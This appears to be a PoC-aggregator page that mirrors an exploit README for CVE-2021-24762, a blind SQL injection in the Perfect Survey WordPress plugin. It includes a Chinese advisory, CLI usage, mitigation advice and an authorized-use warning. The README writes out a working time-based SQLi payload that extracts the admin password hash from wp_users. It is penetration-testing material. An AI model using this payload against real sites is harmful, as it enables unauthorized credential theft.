关联漏洞
标题:
WordPress pluginSQL注入漏洞
(CVE-2021-24762)
描述:WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是WordPress开源的一个应用插件。 Perfect Survey WordPress plugin 1.5.2之前版本存在SQL注入漏洞,该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
描述
This repo shows an exploit to CVE-2021-24762. This is an Blind SQLi exploit that, on default config, greps the admin password.
介绍
# exploit_cve-2021-24762
This repo shows an exploit to CVE-2021-24762. This is an Blind SQLi exploit that, on default config, greps the admin password.
> While doing a lab, based on Wordpress with PerfectSurvey plugin, I stucked on a sql vulnerability. The only available PoC I found were based on sqlmap and wasn't working properly in the lab I was working on (There were a lot of additional questions, e.g. application returning 404, timeouts varying too much, and other issues. So I created this to exploit the lab.
## Goals
- This PoC exploits CVE-2021-24762, which is related to Wordpress plugin Perfect Survey.
The exploit is based in SQL Injection with SLEEP, and it obtains the password hash from the 'admin' user. This user is default on Wordpress environments
- Where it works: Perfect Survey plugin running versions < 1.5.2.
## Impact and Severity
- CVE-2021-24762: [CVSS 9.8 (Crítica)]
- Impacts: confidenciality, integrity, availability, unauthorized access.
## Environment
- Software requirements: Python3.
## How to use
```
____ _ ___ ____
/ ___| / \ |_ _| / ___|
| | / _ \ | | \___ \
| |___ / ___ \ | | __ ) |
\____|/_/ \_\ |___| |____/
CAIS - Inteligência em Cibersegurança
Exploit for: CVE-2021-24762
usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]
Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it
options:
-h, --help show this help message and exit
-u, --url URL Base URL (default: http://192.168.10.10)
-p, --path PATH path (default: /wp-admin/admin-ajax.php)
-d, --delay DELAY delay in seconds (default: 30)
-t, --timeout TIMEOUT
timeout in seconds (default: delay + 15)
-c, --charset CHARSET
charset to be used (default: alnum + ./$_-@)
-m, --max-len MAX_LEN
maximum length (default: 20)
-v, --verbose activates log debugging
```
1. Python script python receives the above parameters. In case they are not passed, script executes with its default values.
2. Ideally, you'll need to pass at least the URL. Do it with -u or --url. Other parameters problably will work with defaults.
3. In default config, it will get the password hash from user admin. This config is applyed in payload variable, in the value of user_login:
`payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`
In case you need to find the hash for other user, change "0x61646d696e" (admin) according to your needs.
## Risks and limitations
- Limitation: In the actual config, this PoC only obtains hash for passwords in wordpress with the default database structures. If you face some modified environment, then you need to change this payload:
`payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`
## Mitigation and remediation (recommendations)
- Mitigation recommendations: Update plugin to version 1.5.2 and above.
- References:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
- https://www.getperfectsurvey.com/
## Warning and authorizations
**Restricted use** — This repo contains sensitive content destinated to ethical and responsible use only.
Remember that you must have writing permission from the owner of the system you are testing on. Any use out of this scope is not allowed and will be charged on you(Do you want to go to jail?).
## Repo structure
- `exploit_cve-2021-24762` — Exploit.
- `README.ME` — This file.
## Changelog
`2025-10-10 — c4cnm — Creation and initial modifications`
## Contact
- Author: Red Team CAIS:/Matheus Camargo (c4cnm), matheus.camargo@rnp.br.
## License
`GNU General Public License v3 (GPL)`
文件快照
[4.0K] /data/pocs/b24405bebca539ee5e077e59d8a43d1716bbc0e4
├── [6.4K] exploit_cve-2021-24762.py
├── [ 34K] LICENSE
└── [3.9K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。